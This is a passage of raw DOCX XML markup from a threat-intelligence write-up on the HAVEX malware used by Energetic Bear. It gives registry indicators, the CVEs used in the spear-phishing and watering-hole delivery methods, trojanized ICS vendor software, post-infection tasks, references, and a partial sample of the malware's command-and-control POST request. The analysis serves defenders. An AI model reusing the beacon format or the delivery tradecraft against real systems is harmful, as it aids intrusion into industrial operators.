        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>HKEY_LOCAL_MACHINE\ SOFTWARE\Microsoft\Internet Explorer\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>InternetRegistry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>\"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>fertger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>InternetRegistry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F9F052" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve">HAVEX </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>Paylod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> Delivery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67855A5F" w14:textId="2D7CA9C2" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:noProof/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BC17648" wp14:editId="11741600">
            <wp:extent cx="5448300" cy="14173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448300" cy="1417320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E8CD86" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Energetic Bear used three major methods to deliver malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B214D71" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>1) Malicious PDF via spear-phishing</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Spear-phishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve"> was used to infect targeted individuals for initial information gathering by delivering malicious PDF documents—in this case, PDF/SWF exploits targeting CVE-2011-0611 to drop malware.3 Even with this running through 2014, older exploits were still valuable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A4D7FF" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>2) Malicious JAR and HTML via a watering hole attack</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Watering hole attacks were used to deliver </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Backdoor.Oldrea</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve"> by Symantec. These attacks exploited CVE-2013-2465, CVE-2013-1347, and CVE-2012-1723 in Java 6, Java 7, IE 7, and IE 8 to drop the HAVEX malware. The exploits appeared to be modified Metasploit Java exploits built to deliver the HAVEX loader.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FF2A59" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>3) Legitimate software loaders</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> Energetic Bear compromised several legitimate ICS vendor websites. Binaries such as camera drivers and PLC management software were modified and made to deliver the HAVEX malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D089AEE" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">In order to complete the third attack type, the threat actor had to compromise several ICS vendors' websites. Sometimes called a Strategic Web Compromise (SWC) attack, these have become a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>favorite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack method from Russian- and Chinese-based threats. In this case, SWC attacks were used to compromise a site that would most likely be visited by customers or users of ICS systems. This made the watering hole or binary compromises much more useful against the targeted victim. Using these three attack types demonstrated an organized and arguably sophisticated threat actor. The team behind this planned and organized a scenario to be successful against its target audience.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2C8D60" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Once malware was delivered, three major tasks were observed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3891CF" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="109"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>System enumeration tools collected information, such as the OS version, machine name and username, and file and directory listings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3EAEA9" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="109"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A credential-harvesting tool extracted stored passwords from various web browsers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBF31A1" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="109"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Secondary implants6 communicated with different C2 infrastructures using custom protocols and payloads executed in memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DFDC16" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320AEF5E" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId177" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00BB5008">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Dragonfly: Cyberespionage Attacks Against Energy Suppliers</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:hyperlink r:id="rId178" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00BB5008">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="688DA58A" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId179" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00BB5008">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Energetic Bear - Crouching Yeti</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:hyperlink r:id="rId180" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00BB5008">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://media.kasperskycontenthub.com/wp-content/uploads/sites/58/2018/03/09092926/EB-YetiJuly2014-Public.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1D148869" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[The Alley of Compromise](</w:t>
      </w:r>
      <w:hyperlink r:id="rId181" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00BB5008">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.crowdstrike.com/blog/cve-2014-1761-alley-compromise</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:hyperlink r:id="rId182" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00BB5008">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.crowdstrike.com/blog/cve-2014-1761-alley-compromise</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C1DF7D" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>HAVEX HTTP REQUEST SAMPLE</w:t>
      </w:r>
      <w:hyperlink r:id="rId183" w:anchor="havex-http-request-sample" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB5008">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="23A792DB" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>POST Request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB9AA3B" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>POST /wp08/wp-includes/dtcla.php?id=285745296322896178920098FD80-20&amp;v1=038&amp;v2=170393861&amp;q=5265882854508EFCF958F979E4 HTTP/1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t xml:space="preserve">User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>en</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t xml:space="preserve">-US) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>AppleWebKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>/525.19(KHTML, like Gecko) Chrome/1.0.154.36 Safari/525.19</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
